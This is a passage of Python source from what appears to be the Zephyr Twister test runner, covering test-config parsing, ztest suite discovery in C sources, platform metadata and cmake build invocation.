self.common = self.data['common']
def _cast_value(self, value, typestr):
if isinstance(value, str):
v = value.strip()
if typestr == "str":
return v
elif typestr == "float":
return float(value)
elif typestr == "int":
return int(value)
elif typestr == "bool":
return value
elif typestr.startswith("list") and isinstance(value, list):
return value
elif typestr.startswith("list") and isinstance(value, str):
vs = v.split()
if len(typestr) > 4 and typestr[4] == ":":
return [self._cast_value(vsi, typestr[5:]) for vsi in vs]
else:
return vs
elif typestr.startswith("set"):
vs = v.split()
if len(typestr) > 3 and typestr[3] == ":":
return {self._cast_value(vsi, typestr[4:]) for vsi in vs}
else:
return set(vs)
elif typestr.startswith("map"):
return value
else:
raise ConfigurationError(
self.filename, "unknown type '%s'" % typestr)
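# Minimal sketch of the conversions performed by _cast_value above
# (inputs are hypothetical):
#
#   parser._cast_value("8", "int")         # -> 8
#   parser._cast_value("a b c", "list")    # -> ["a", "b", "c"]
#   parser._cast_value("1 2", "list:int")  # -> [1, 2]
#   parser._cast_value("x y x", "set")     # -> {"x", "y"}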
def get_test(self, name, valid_keys):
"""Get a dictionary representing the keys/values within a test
@param name The test in the .yaml file to retrieve data from
@param valid_keys A dictionary representing the intended semantics
for this test. Each key in this dictionary is a key that could
be specified; if a key is given in the .yaml file which isn't
listed here, it will generate an error. Each value in this dictionary
is another dictionary containing metadata:
"default" - Default value if not given
"type" - Data type to convert the text value to. Simple types
supported are "str", "float", "int", "bool" which will get
converted to respective Python data types. "set" and "list"
may also be specified which will split the value by
whitespace (but keep the elements as strings). Finally,
"list:<type>" and "set:<type>" may be given which will
perform a type conversion after splitting the value up.
"required" - If true, raise an error if not defined. If false
and "default" isn't specified, a type conversion will be
done on an empty string
@return A dictionary containing the test key-value pairs with
type conversion and default values filled in per valid_keys
"""
d = {}
for k, v in self.common.items():
d[k] = v
for k, v in self.tests[name].items():
if k in d:
if isinstance(d[k], str):
# By default, we just concatenate string values of keys
# which appear both in "common" and per-test sections,
# but some keys are handled in adhoc way based on their
# semantics.
if k == "filter":
d[k] = "(%s) and (%s)" % (d[k], v)
else:
d[k] += " " + v
else:
d[k] = v
for k, kinfo in valid_keys.items():
if k not in d:
if "required" in kinfo:
required = kinfo["required"]
else:
required = False
if required:
raise ConfigurationError(
self.filename,
"missing required value for '%s' in test '%s'" %
(k, name))
else:
if "default" in kinfo:
default = kinfo["default"]
else:
default = self._cast_value("", kinfo["type"])
d[k] = default
else:
try:
d[k] = self._cast_value(d[k], kinfo["type"])
except ValueError:
raise ConfigurationError(
self.filename, "bad %s value '%s' for key '%s' in name '%s'" %
(kinfo["type"], d[k], k, name))
return d
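# Sketch of the "common"/per-test merge above, assuming a hypothetical
# testcase.yaml:
#
#   common:
#     filter: CONFIG_FOO
#   tests:
#     kernel.common.misra:
#       filter: CONFIG_BAR
#
# get_test("kernel.common.misra", ...) yields
# filter == "(CONFIG_FOO) and (CONFIG_BAR)"; other string keys present in
# both sections are simply concatenated with a space.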
class Platform:
"""Class representing metadata for a particular platform
Maps directly to BOARD when building"""
platform_schema = scl.yaml_load(os.path.join(ZEPHYR_BASE,
"scripts", "schemas", "twister", "platform-schema.yaml"))
def __init__(self):
"""Constructor.
"""
self.name = ""
self.twister = True
# if no RAM size is specified by the board, take a default of 128K
self.ram = 128
self.timeout_multiplier = 1.0
self.ignore_tags = []
self.only_tags = []
self.default = False
# if no flash size is specified by the board, take a default of 512K
self.flash = 512
self.supported = set()
self.arch = ""
self.type = "na"
self.simulation = "na"
self.supported_toolchains = []
self.env = []
self.env_satisfied = True
self.filter_data = dict()
def load(self, platform_file):
scp = TwisterConfigParser(platform_file, self.platform_schema)
scp.load()
data = scp.data
self.name = data['identifier']
self.twister = data.get("twister", True)
# if no RAM size is specified by the board, take a default of 128K
self.ram = data.get("ram", 128)
testing = data.get("testing", {})
self.timeout_multiplier = testing.get("timeout_multiplier", 1.0)
self.ignore_tags = testing.get("ignore_tags", [])
self.only_tags = testing.get("only_tags", [])
self.default = testing.get("default", False)
# if no flash size is specified by the board, take a default of 512K
self.flash = data.get("flash", 512)
self.supported = set()
for supp_feature in data.get("supported", []):
for item in supp_feature.split(":"):
self.supported.add(item)
self.arch = data['arch']
self.type = data.get('type', "na")
self.simulation = data.get('simulation', "na")
self.supported_toolchains = data.get("toolchain", [])
self.env = data.get("env", [])
self.env_satisfied = True
for env in self.env:
if not os.environ.get(env, None):
self.env_satisfied = False
def __repr__(self):
return "<%s on %s>" % (self.name, self.arch)
class DisablePyTestCollectionMixin(object):
__test__ = False
class ScanPathResult:
"""Result of the TestSuite.scan_path function call.
Attributes:
matches A list of test cases
warnings A string containing one or more
warnings to display
has_registered_test_suites Whether or not the path contained any
calls to the ztest_register_test_suite
macro.
has_run_registered_test_suites Whether or not the path contained at
least one call to
ztest_run_registered_test_suites.
has_test_main Whether or not the path contains a
definition of test_main(void)
ztest_suite_names Names of found ztest suites
"""
def __init__(self,
matches: List[str] = None,
warnings: str = None,
has_registered_test_suites: bool = False,
has_run_registered_test_suites: bool = False,
has_test_main: bool = False,
ztest_suite_names: List[str] = None):
self.matches = matches
self.warnings = warnings
self.has_registered_test_suites = has_registered_test_suites
self.has_run_registered_test_suites = has_run_registered_test_suites
self.has_test_main = has_test_main
# Guard against the shared-mutable-default-argument pitfall
self.ztest_suite_names = ztest_suite_names if ztest_suite_names is not None else []
def __eq__(self, other):
if not isinstance(other, ScanPathResult):
return False
return (sorted(self.matches) == sorted(other.matches) and
self.warnings == other.warnings and
(self.has_registered_test_suites ==
other.has_registered_test_suites) and
(self.has_run_registered_test_suites ==
other.has_run_registered_test_suites) and
self.has_test_main == other.has_test_main and
(sorted(self.ztest_suite_names) ==
sorted(other.ztest_suite_names)))
class TestCase(DisablePyTestCollectionMixin):
def __init__(self, name=None, testsuite=None):
self.duration = 0
self.name = name
self.status = None
self.reason = None
self.testsuite = testsuite
self.output = ""
def __lt__(self, other):
return self.name < other.name
def __repr__(self):
return "<TestCase %s with %s>" % (self.name, self.status)
def __str__(self):
return self.name
class TestSuite(DisablePyTestCollectionMixin):
"""Class representing a test application
"""
def __init__(self, testsuite_root, workdir, name):
"""TestSuite constructor.
This gets called by TestPlan as it finds and reads test yaml files.
Multiple TestSuite instances may be generated from a single testcase.yaml,
each one corresponds to an entry within that file.
We need to have a unique name for every single test case. Since
a testcase.yaml can define multiple tests, the canonical name for
the test case is <workdir>/<name>.
@param testsuite_root os.path.abspath() of one of the --testcase-root
@param workdir Sub-directory of testsuite_root where the
.yaml test configuration file was found
@param name Name of this test case, corresponding to the entry name
in the test case configuration file. For many test cases that just
define one test, can be anything and is usually "test". This is
really only used to distinguish between different cases when
the testcase.yaml defines multiple tests
"""
self.source_dir = ""
self.yamlfile = ""
self.testcases = []
self.name = self.get_unique(testsuite_root, workdir, name)
self.id = name
self.type = None
self.tags = set()
self.extra_args = None
self.extra_configs = None
self.arch_allow = None
self.arch_exclude = None
self.skip = False
self.platform_exclude = None
self.platform_allow = None
self.platform_type = []
self.toolchain_exclude = None
self.toolchain_allow = None
self.ts_filter = None
self.timeout = 60
self.harness = ""
self.harness_config = {}
self.build_only = True
self.build_on_all = False
self.slow = False
self.min_ram = -1
self.depends_on = None
self.min_flash = -1
self.extra_sections = None
self.integration_platforms = []
self.ztest_suite_names = []
def add_testcase(self, name):
tc = TestCase(name=name, testsuite=self)
self.testcases.append(tc)
@staticmethod
def get_unique(testsuite_root, workdir, name):
canonical_testsuite_root = os.path.realpath(testsuite_root)
if Path(canonical_zephyr_base) in Path(canonical_testsuite_root).parents:
# This is in ZEPHYR_BASE, so include path in name for uniqueness
# FIXME: We should not depend on path of test for unique names.
relative_tc_root = os.path.relpath(canonical_testsuite_root,
start=canonical_zephyr_base)
else:
relative_tc_root = ""
# workdir can be "."
unique = os.path.normpath(os.path.join(relative_tc_root, workdir, name))
check = name.split(".")
if len(check) < 2:
raise TwisterException(
f"bad test name '{name}' in {testsuite_root}/{workdir}. "
"Tests should reference the category and subsystem with a dot as a separator.")
return unique
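# Example of the uniqueness rule above (hypothetical paths): for a suite
# found under ZEPHYR_BASE/tests with workdir "kernel/sleep" and entry
# name "kernel.sleep", the canonical name becomes
# "tests/kernel/sleep/kernel.sleep"; a dot-less name such as "sleep"
# raises TwisterException.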
def scan_file(self, inf_name):
regular_suite_regex = re.compile(
# do not match until end-of-line, otherwise we won't allow the
# testcase regex (see _find_regular_ztest_testcases) to catch the
# ones that are declared on the same line--as we only search
# starting at the end of this match
br"^\s*ztest_test_suite\(\s*(?P<suite_name>[a-zA-Z0-9_]+)\s*,",
re.MULTILINE)
registered_suite_regex = re.compile(
br"^\s*ztest_register_test_suite"
br"\(\s*(?P<suite_name>[a-zA-Z0-9_]+)\s*,",
re.MULTILINE)
new_suite_regex = re.compile(
br"^\s*ZTEST_SUITE\(\s*(?P<suite_name>[a-zA-Z0-9_]+)\s*,",
re.MULTILINE)
# Checks if the file contains a definition of "void test_main(void)"
# Since ztest provides a plain test_main implementation it is OK to:
# 1. register test suites and not call the run function iff the test
# doesn't have a custom test_main.
# 2. register test suites and a custom test_main definition iff the test
# also calls ztest_run_registered_test_suites.
test_main_regex = re.compile(
br"^\s*void\s+test_main\(void\)",
re.MULTILINE)
registered_suite_run_regex = re.compile(
br"^\s*ztest_run_registered_test_suites\("
br"(\*+|&)?(?P<state_identifier>[a-zA-Z0-9_]+)\)",
re.MULTILINE)
warnings = None
has_registered_test_suites = False
has_run_registered_test_suites = False
has_test_main = False
with open(inf_name) as inf:
if os.name == 'nt':
mmap_args = {'fileno': inf.fileno(), 'length': 0, 'access': mmap.ACCESS_READ}
else:
mmap_args = {'fileno': inf.fileno(), 'length': 0, 'flags': mmap.MAP_PRIVATE, 'prot': mmap.PROT_READ,
'offset': 0}
with contextlib.closing(mmap.mmap(**mmap_args)) as main_c:
regular_suite_regex_matches = \
[m for m in regular_suite_regex.finditer(main_c)]
registered_suite_regex_matches = \
[m for m in registered_suite_regex.finditer(main_c)]
new_suite_regex_matches = \
[m for m in new_suite_regex.finditer(main_c)]
if registered_suite_regex_matches:
has_registered_test_suites = True
if registered_suite_run_regex.search(main_c):
has_run_registered_test_suites = True
if test_main_regex.search(main_c):
has_test_main = True
if regular_suite_regex_matches:
ztest_suite_names = \
self._extract_ztest_suite_names(regular_suite_regex_matches)
testcase_names, warnings = \
self._find_regular_ztest_testcases(main_c, regular_suite_regex_matches, has_registered_test_suites)
elif registered_suite_regex_matches:
ztest_suite_names = \
self._extract_ztest_suite_names(registered_suite_regex_matches)
testcase_names, warnings = \
self._find_regular_ztest_testcases(main_c, registered_suite_regex_matches, has_registered_test_suites)
elif new_suite_regex_matches:
ztest_suite_names = \
self._extract_ztest_suite_names(new_suite_regex_matches)
testcase_names, warnings = \
self._find_new_ztest_testcases(main_c)
else:
# can't find ztest_test_suite, maybe a client, because
# it includes ztest.h
ztest_suite_names = []
testcase_names, warnings = None, None
return ScanPathResult(
matches=testcase_names,
warnings=warnings,
has_registered_test_suites=has_registered_test_suites,
has_run_registered_test_suites=has_run_registered_test_suites,
has_test_main=has_test_main,
ztest_suite_names=ztest_suite_names)
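# Illustrative result (hypothetical source file): a file containing
#
#   ZTEST_SUITE(foo_suite, NULL, NULL, NULL, NULL, NULL);
#   ZTEST(foo_suite, test_bar) { ... }
#
# yields a ScanPathResult with ztest_suite_names == ["foo_suite"] and
# matches == ["bar"] (the "test_" prefix is stripped).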
@staticmethod
def _extract_ztest_suite_names(suite_regex_matches):
ztest_suite_names = \
[m.group("suite_name") for m in suite_regex_matches]
ztest_suite_names = \
[name.decode("UTF-8") for name in ztest_suite_names]
return ztest_suite_names
def _find_regular_ztest_testcases(self, search_area, suite_regex_matches, is_registered_test_suite):
"""
Find regular ztest testcases like "ztest_unit_test" or similar. Return
the testcase names and any warnings found.
"""
testcase_regex = re.compile(
br"""^\s* # empty space at the beginning is ok
# catch the case where it is declared on the same line, e.g.:
#
# ztest_test_suite(mutex_complex, ztest_user_unit_test(TESTNAME));
# ztest_register_test_suite(n, p, ztest_user_unit_test(TESTNAME),
(?:ztest_
(?:test_suite\(|register_test_suite\([a-zA-Z0-9_]+\s*,\s*)
[a-zA-Z0-9_]+\s*,\s*
)?
# Catch ztest[_user]_unit_test-[_setup_teardown](TESTNAME)
ztest_(?:1cpu_)?(?:user_)?unit_test(?:_setup_teardown)?
# Consume the argument that becomes the extra testcase
\(\s*(?P<testcase_name>[a-zA-Z0-9_]+)
# _setup_teardown() variant has two extra arguments that we ignore
(?:\s*,\s*[a-zA-Z0-9_]+\s*,\s*[a-zA-Z0-9_]+)?
\s*\)""",
# We don't check how it finishes; we don't care
re.MULTILINE | re.VERBOSE)
achtung_regex = re.compile(
br"(#ifdef|#endif)",
re.MULTILINE)
search_start, search_end = \
self._get_search_area_boundary(search_area, suite_regex_matches, is_registered_test_suite)
limited_search_area = search_area[search_start:search_end]
testcase_names, warnings = \
self._find_ztest_testcases(limited_search_area, testcase_regex)
achtung_matches = re.findall(achtung_regex, limited_search_area)
if achtung_matches and warnings is None:
achtung = ", ".join(sorted({match.decode() for match in achtung_matches},reverse = True))
warnings = f"found invalid {achtung} in ztest_test_suite()"
return testcase_names, warnings
@staticmethod
def _get_search_area_boundary(search_area, suite_regex_matches, is_registered_test_suite):
"""
Get search area boundary based on "ztest_test_suite(...)",
"ztest_register_test_suite(...)" or "ztest_run_test_suite(...)"
functions occurrence.
"""
suite_run_regex = re.compile(
br"^\s*ztest_run_test_suite\((?P<suite_name>[a-zA-Z0-9_]+)\)",
re.MULTILINE)
search_start = suite_regex_matches[0].end()
suite_run_match = suite_run_regex.search(search_area)
if suite_run_match:
search_end = suite_run_match.start()
elif not is_registered_test_suite:
raise ValueError("can't find ztest_run_test_suite")
else:
search_end = re.compile(br"\);", re.MULTILINE) \
.search(search_area, search_start) \
.end()
return search_start, search_end
def _find_new_ztest_testcases(self, search_area):
"""
Find new-style ztest testcases declared with "ZTEST" or "ZTEST_F".
Return the testcase names and any warnings found.
"""
testcase_regex = re.compile(
br"^\s*(?:ZTEST|ZTEST_F)\(\s*(?P<suite_name>[a-zA-Z0-9_]+)\s*,"
br"\s*(?P<testcase_name>[a-zA-Z0-9_]+)\s*",
re.MULTILINE)
return self._find_ztest_testcases(search_area, testcase_regex)
@staticmethod
def _find_ztest_testcases(search_area, testcase_regex):
"""
Parse the search area and try to find testcases matching the given
testcase_regex argument. Return the testcase names and any warnings found.
"""
testcase_regex_matches = \
[m for m in testcase_regex.finditer(search_area)]
testcase_names = \
[m.group("testcase_name") for m in testcase_regex_matches]
testcase_names = [name.decode("UTF-8") for name in testcase_names]
warnings = None
for testcase_name in testcase_names:
if not testcase_name.startswith("test_"):
warnings = "Found a test that does not start with test_"
testcase_names = \
[tc_name.replace("test_", "", 1) for tc_name in testcase_names]
return testcase_names, warnings
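# For example (hypothetical input, using the regular-suite regex): a
# search area containing "ztest_unit_test(test_foo)" yields
# (["foo"], None), while "ztest_unit_test(bar)" yields
# (["bar"], "Found a test that does not start with test_").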
def scan_path(self, path):
subcases = []
has_registered_test_suites = False
has_run_registered_test_suites = False
has_test_main = False
ztest_suite_names = []
src_dir_path = self._find_src_dir_path(path)
for filename in glob.glob(os.path.join(src_dir_path, "*.c*")):
try:
result: ScanPathResult = self.scan_file(filename)
if result.warnings:
logger.error("%s: %s" % (filename, result.warnings))
raise TwisterRuntimeError(
"%s: %s" % (filename, result.warnings))
if result.matches:
subcases += result.matches
if result.has_registered_test_suites:
has_registered_test_suites = True
if result.has_run_registered_test_suites:
has_run_registered_test_suites = True
if result.has_test_main:
has_test_main = True
if result.ztest_suite_names:
ztest_suite_names += result.ztest_suite_names
except ValueError as e:
logger.error("%s: can't find: %s" % (filename, e))
for filename in glob.glob(os.path.join(path, "*.c")):
try:
result: ScanPathResult = self.scan_file(filename)
if result.warnings:
logger.error("%s: %s" % (filename, result.warnings))
if result.matches:
subcases += result.matches
if result.ztest_suite_names:
ztest_suite_names += result.ztest_suite_names
except ValueError as e:
logger.error("%s: can't find: %s" % (filename, e))
if (has_registered_test_suites and has_test_main and
not has_run_registered_test_suites):
warning = \
"Found call to 'ztest_register_test_suite()' but no "\
"call to 'ztest_run_registered_test_suites()'"
logger.error(warning)
raise TwisterRuntimeError(warning)
return subcases, ztest_suite_names
def parse_subcases(self, test_path):
subcases, ztest_suite_names = self.scan_path(test_path)
# if testcases are provided as part of the yaml, skip this step.
if not self.testcases:
# only add each testcase once
for sub in set(subcases):
name = "{}.{}".format(self.id, sub)
self.add_testcase(name)
if not subcases:
self.add_testcase(self.id)
self.ztest_suite_names = ztest_suite_names
@staticmethod
def _find_src_dir_path(test_dir_path):
"""
Try to find the src directory containing the test source code.
Sometimes, for optimization reasons, it is placed in the parent
"""
src_dir_name = "src"
src_dir_path = os.path.join(test_dir_path, src_dir_name)
if os.path.isdir(src_dir_path):
return src_dir_path
src_dir_path = os.path.join(test_dir_path, "..", src_dir_name)
if os.path.isdir(src_dir_path):
return src_dir_path
return ""
def __str__(self):
return self.name
class TestInstance(DisablePyTestCollectionMixin):
"""Class representing the execution of a particular TestSuite on a platform
@param testsuite The TestSuite object we want to build/execute
@param platform Platform object that we want to build and run against
@param outdir Base directory for all test results. The actual
output directory used is <outdir>/<platform>/<test suite name>
"""
def __init__(self, testsuite, platform, outdir):
self.testsuite = testsuite
self.platform = platform
self.status = None
self.reason = "Unknown"
self.metrics = dict()
self.handler = None
self.outdir = outdir
self.execution_time = 0
self.name = os.path.join(platform.name, testsuite.name)
self.run_id = self._get_run_id()
self.build_dir = os.path.join(outdir, platform.name, testsuite.name)
self.run = False
self.testcases = []
self.init_cases()
# FIXME: copying testcase objects from the testsuite needs a better solution.
def init_cases(self):
for c in self.testsuite.testcases:
self.add_testcase(c.name)
def _get_run_id(self):
""" generate run id from instance unique identifier and a random
number"""
hash_object = hashlib.md5(self.name.encode())
random_str = f"{random.getrandbits(64)}".encode()
hash_object.update(random_str)
return hash_object.hexdigest()
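# Derivation sketch (values illustrative): the run id is
# md5(b"native_posix/tests/foo" + b"<decimal string of 64 random bits>")
# as a hex digest, i.e. unique per instance name and per twister
# invocation.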
def add_missing_testscases(self, status, reason=None):
for case in self.testcases:
if not case.status:
case.status = status
if reason:
case.reason = reason
else:
case.reason = self.reason
def __getstate__(self):
d = self.__dict__.copy()
return d
def __setstate__(self, d):
self.__dict__.update(d)
def __lt__(self, other):
return self.name < other.name
def set_case_status_by_name(self, name, status, reason=None):
tc = self.get_case_or_create(name)
tc.status = status
if reason:
tc.reason = reason
return tc
def add_testcase(self, name):
tc = TestCase(name=name)
self.testcases.append(tc)
return tc
def get_case_by_name(self, name):
for c in self.testcases:
if c.name == name:
return c
return None
def get_case_or_create(self, name):
for c in self.testcases:
if c.name == name:
return c
logger.debug(f"Could not find a matching testcase for {name}")
tc = TestCase(name=name)
self.testcases.append(tc)
return tc
@staticmethod
def testsuite_runnable(testsuite, fixtures):
can_run = False
# console harness allows us to run the test and capture data.
if testsuite.harness in ['console', 'ztest', 'pytest']:
can_run = True
# if we have a fixture that is also being supplied on the
# command-line, then we need to run the test, not just build it.
fixture = testsuite.harness_config.get('fixture')
if fixture:
can_run = (fixture in fixtures)
elif testsuite.harness:
can_run = False
else:
can_run = True
return can_run
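# Decision sketch (hypothetical suite): with harness == "console" and
# harness_config == {"fixture": "gpio_loopback"}, the suite is runnable
# only when "gpio_loopback" was supplied via the fixtures argument; an
# empty harness is always runnable; any other harness is build-only.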
# Global testsuite parameters
def check_runnable(self, enable_slow=False, filter='buildable', fixtures=[]):
# Right now Windows only supports building; running tests is still
# a work in progress.
if os.name == 'nt':
return False
# we asked for build-only on the command line
if self.testsuite.build_only:
return False
# Do not run slow tests:
skip_slow = self.testsuite.slow and not enable_slow
if skip_slow:
return False
target_ready = bool(self.testsuite.type == "unit" or \
self.platform.type == "native" or \
self.platform.simulation in ["mdb-nsim", "nsim", "renode", "qemu", "tsim", "armfvp", "xt-sim"] or \
filter == 'runnable')
if self.platform.simulation == "nsim":
if not find_executable("nsimdrv"):
target_ready = False
if self.platform.simulation == "mdb-nsim":
if not find_executable("mdb"):
target_ready = False
if self.platform.simulation == "renode":
if not find_executable("renode"):
target_ready = False
if self.platform.simulation == "tsim":
if not find_executable("tsim-leon3"):
target_ready = False
testsuite_runnable = self.testsuite_runnable(self.testsuite, fixtures)
return testsuite_runnable and target_ready
def create_overlay(self, platform, enable_asan=False, enable_ubsan=False, enable_coverage=False, coverage_platform=[]):
# Create this in a "twister/" subdirectory otherwise this
# will pass this overlay to kconfig.py *twice* and kconfig.cmake
# will silently give that second time precedence over any
# --extra-args=CONFIG_*
subdir = os.path.join(self.build_dir, "twister")
content = ""
if self.testsuite.extra_configs:
content = "\n".join(self.testsuite.extra_configs)
if enable_coverage:
if platform.name in coverage_platform:
content = content + "\nCONFIG_COVERAGE=y"
content = content + "\nCONFIG_COVERAGE_DUMP=y"
if enable_asan:
if platform.type == "native":
content = content + "\nCONFIG_ASAN=y"
if enable_ubsan:
if platform.type == "native":
content = content + "\nCONFIG_UBSAN=y"
if content:
os.makedirs(subdir, exist_ok=True)
file = os.path.join(subdir, "testsuite_extra.conf")
with open(file, "w") as f:
f.write(content)
return content
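# For a native platform listed in coverage_platform, with ASan enabled,
# the generated twister/testsuite_extra.conf would contain (illustrative):
#
#   CONFIG_COVERAGE=y
#   CONFIG_COVERAGE_DUMP=y
#   CONFIG_ASAN=y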
def calculate_sizes(self):
"""Get the RAM/ROM sizes of a test case.
This can only be run after the instance has been executed by
MakeGenerator, otherwise there won't be any binaries to measure.
@return A SizeCalculator object
"""
fns = glob.glob(os.path.join(self.build_dir, "zephyr", "*.elf"))
fns.extend(glob.glob(os.path.join(self.build_dir, "zephyr", "*.exe")))
fns = [x for x in fns if '_pre' not in x]
if len(fns) != 1:
raise BuildError("Missing/multiple output ELF binary")
return SizeCalculator(fns[0], self.testsuite.extra_sections)
def __repr__(self):
return "<TestSuite %s on %s>" % (self.testsuite.name, self.platform.name)
class CMake():
config_re = re.compile(r'(CONFIG_[A-Za-z0-9_]+)="?([^"]*)"?$')
dt_re = re.compile(r'([A-Za-z0-9_]+)="?([^"]*)"?$')
def __init__(self, testsuite, platform, source_dir, build_dir):
self.cwd = None
self.capture_output = True
self.defconfig = {}
self.cmake_cache = {}
self.instance = None
self.testsuite = testsuite
self.platform = platform
self.source_dir = source_dir
self.build_dir = build_dir
self.log = "build.log"
self.generator = None
self.generator_cmd = None
self.default_encoding = sys.getdefaultencoding()
def parse_generated(self):
self.defconfig = {}
return {}
def run_build(self, args=[]):
logger.debug("Building %s for %s" % (self.source_dir, self.platform.name))
cmake_args = []
cmake_args.extend(args)
cmake = shutil.which('cmake')
cmd = [cmake] + cmake_args
kwargs = dict()
if self.capture_output:
kwargs['stdout'] = subprocess.PIPE
# CMake sends the output of message() to stderr unless it's STATUS
kwargs['stderr'] = subprocess.STDOUT
if self.cwd:
kwargs['cwd'] = self.cwd
p = subprocess.Popen(cmd, **kwargs)
out, _ = p.communicate()
results = {}
if p.returncode == 0:
msg = "Finished building %s for %s" % (self.source_dir, self.platform.name)
self.instance.status = "passed"
if not self.instance.run:
self.instance.add_missing_testscases("skipped", "Test was built only")
results = {'msg': msg, "returncode": p.returncode, "instance": self.instance}
if out:
log_msg = out.decode(self.default_encoding)
with open(os.path.join(self.build_dir, self.log), "a", encoding=self.default_encoding) as log:
log.write(log_msg)
else:
return None
else:
# A real error occurred, raise an exception
log_msg = ""
if out:
log_msg = out.decode(self.default_encoding)
with open(os.path.join(self.build_dir, self.log), "a", encoding=self.default_encoding) as log:
log.write(log_msg)
if log_msg:
overflow_found = re.findall("region `(FLASH|ROM|RAM|ICCM|DCCM|SRAM)' overflowed by", log_msg)
if overflow_found and not self.overflow_as_errors:
logger.debug("Test skipped due to {} Overflow".format(overflow_found[0]))
self.instance.status = "skipped"
self.instance.reason = "{} overflow".format(overflow_found[0])
else:
self.instance.status = "error"
self.instance.reason = "Build failure"
results = {
"returncode": p.returncode,
"instance": self.instance,
}
return results
def run_cmake(self, args=[]):
if self.warnings_as_errors:
ldflags = "-Wl,--fatal-warnings"
cflags = "-Werror"
aflags = "-Werror -Wa,--fatal-warnings"
gen_defines_args = "--edtlib-Werror"
else:
ldflags = cflags = aflags = ""
gen_defines_args = ""
logger.debug("Running cmake on %s for %s" % (self.source_dir, self.platform.name))
cmake_args = [
f'-B{self.build_dir}',
f'-S{self.source_dir}',
f'-DTC_RUNID={self.instance.run_id}',
f'-DEXTRA_CFLAGS={cflags}',
f'-DEXTRA_AFLAGS={aflags}',
f'-DEXTRA_LDFLAGS={ldflags}',
f'-DEXTRA_GEN_DEFINES_ARGS={gen_defines_args}',
f'-G{self.generator}'
]
args = ["-D{}".format(a.replace('"', '')) for a in args]
cmake_args.extend(args)
cmake_opts = ['-DBOARD={}'.format(self.platform.name)]
cmake_args.extend(cmake_opts)
logger.debug("Calling cmake with arguments: {}".format(cmake_args))
cmake = shutil.which('cmake')
cmd = [cmake] + cmake_args
kwargs = dict()
if self.capture_output:
kwargs['stdout'] = subprocess.PIPE
# CMake sends the output of message() to stderr unless it's STATUS
kwargs['stderr'] = subprocess.STDOUT
if self.cwd:
kwargs['cwd'] = self.cwd
p = subprocess.Popen(cmd, **kwargs)
out, _ = p.communicate()
if p.returncode == 0:
filter_results = self.parse_generated()
msg = "Finished building %s for %s" % (self.source_dir, self.platform.name)
logger.debug(msg)
results = {'msg': msg, 'filter': filter_results}
else:
self.instance.status = "error"
self.instance.reason = "Cmake build failure"
for tc in self.instance.testcases:
tc.status = self.instance.status
logger.error("Cmake build failure: %s for %s" % (self.source_dir, self.platform.name))
results = {"returncode": p.returncode}
if out:
with open(os.path.join(self.build_dir, self.log), "a", encoding=self.default_encoding) as log:
log_msg = out.decode(self.default_encoding)
log.write(log_msg)
return results
@staticmethod
def run_cmake_script(args=[]):
logger.debug("Running cmake script %s" % (args[0]))
cmake_args = ["-D{}".format(a.replace('"', '')) for a in args[1:]]
cmake_args.extend(['-P', args[0]])
logger.debug("Calling cmake with arguments: {}".format(cmake_args))
cmake = shutil.which('cmake')
if not cmake:
msg = "Unable to find `cmake` in path"
logger.error(msg)
raise Exception(msg)
cmd = [cmake] + cmake_args
kwargs = dict()
kwargs['stdout'] = subprocess.PIPE
# CMake sends the output of message() to stderr unless it's STATUS
kwargs['stderr'] = subprocess.STDOUT
p = subprocess.Popen(cmd, **kwargs)
out, _ = p.communicate()
# It might happen that the environment adds ANSI escape codes like \x1b[0m,
# for instance if twister is executed from inside a makefile. In such a
# scenario it is then necessary to remove them, as otherwise the JSON decoding
# will fail.
ansi_escape = re.compile(r'\x1B(?:[@-Z\\-_]|\[[0-?]*[ -/]*[@-~])')
out = ansi_escape.sub('', out.decode())
if p.returncode == 0:
msg = "Finished running %s" % (args[0])
logger.debug(msg)
results = {"returncode": p.returncode, "msg": msg, "stdout": out}
else:
logger.error("Cmake script failure: %s" % (args[0]))
results = {"returncode": p.returncode, "returnmsg": out}
return results
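# Illustrative invocation (hypothetical script path):
#
#   CMake.run_cmake_script(["cmake/verify-toolchain.cmake", "FORMAT=json"])
#
# runs `cmake -DFORMAT=json -P cmake/verify-toolchain.cmake` and, on
# success, returns the ANSI-scrubbed stdout under results["stdout"].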
class FilterBuilder(CMake):
def __init__(self, testsuite, platform, source_dir, build_dir):
super().__init__(testsuite, platform, source_dir, build_dir)
self.log = "config-twister.log"
def parse_generated(self):
if self.platform.name == "unit_testing":
return {}
cmake_cache_path = os.path.join(self.build_dir, "CMakeCache.txt")
defconfig_path = os.path.join(self.build_dir, "zephyr", ".config")
with open(defconfig_path, "r") as fp:
defconfig = {}
for line in fp.readlines():
m = self.config_re.match(line)
if not m:
if line.strip() and not line.startswith("#"):
sys.stderr.write("Unrecognized line %s\n" % line)
continue
defconfig[m.group(1)] = m.group(2).strip()
self.defconfig = defconfig
cmake_conf = {}
try:
cache = CMakeCache.from_file(cmake_cache_path)
except FileNotFoundError:
cache = {}
for k in iter(cache):
cmake_conf[k.name] = k.value
self.cmake_cache = cmake_conf
filter_data = {
"ARCH": self.platform.arch,
"PLATFORM": self.platform.name
}
filter_data.update(os.environ)
filter_data.update(self.defconfig)
filter_data.update(self.cmake_cache)
edt_pickle = os.path.join(self.build_dir, "zephyr", "edt.pickle")
if self.testsuite and self.testsuite.ts_filter:
try:
if os.path.exists(edt_pickle):
with open(edt_pickle, 'rb') as f:
edt = pickle.load(f)
else:
edt = None
res = expr_parser.parse(self.testsuite.ts_filter, filter_data, edt)
except (ValueError, SyntaxError) as se:
sys.stderr.write(
"Failed processing %s\n" % self.testsuite.yamlfile)
raise se
if not res:
return {os.path.join(self.platform.name, self.testsuite.name): True}
else:
return {os.path.join(self.platform.name, self.testsuite.name): False}
else:
self.platform.filter_data = filter_data
return filter_data
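# Example evaluation (hypothetical filter): with ts_filter set to
# "CONFIG_ARCH_HAS_USERSPACE and ARCH == 'arm'", expr_parser.parse() sees
# the merged environment/defconfig/CMake-cache dictionary built above; a
# false result maps the instance name to True, meaning "filter this
# instance out".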
class ProjectBuilder(FilterBuilder):
def __init__(self, tplan, instance, **kwargs):
super().__init__(instance.testsuite, instance.platform, instance.testsuite.source_dir, instance.build_dir)
self.log = "build.log"
self.instance = instance
self.testplan = tplan
self.filtered_tests = 0
self.lsan = kwargs.get('lsan', False)
self.asan = kwargs.get('asan', False)
self.ubsan = kwargs.get('ubsan', False)
self.valgrind = kwargs.get('valgrind', False)
self.extra_args = kwargs.get('extra_args', [])
self.device_testing = kwargs.get('device_testing', False)
self.cmake_only = kwargs.get('cmake_only', False)
self.cleanup = kwargs.get('cleanup', False)
self.coverage = kwargs.get('coverage', False)
self.inline_logs = kwargs.get('inline_logs', False)
self.generator = kwargs.get('generator', None)
